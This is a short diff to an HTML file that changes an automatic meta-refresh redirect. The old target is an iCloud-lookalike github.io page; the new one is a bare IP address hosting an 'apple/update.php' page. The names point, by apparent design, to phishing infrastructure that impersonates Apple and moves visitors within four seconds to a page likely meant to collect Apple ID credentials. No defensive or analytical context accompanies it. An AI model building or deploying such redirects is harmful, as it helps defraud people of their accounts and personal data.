--- a/app.htm
+++ b/app.htm
@@ -35,5 +35,5 @@
 </div>
 
 
-<meta http-equiv="refresh" content="4;url=https://app1eid.github.io/icloud.com-id94131201/app0.htm">
+<meta http-equiv="refresh" content="4;url=http://207.210.200.146/~goontone/apple/update.php">
 </body></html>
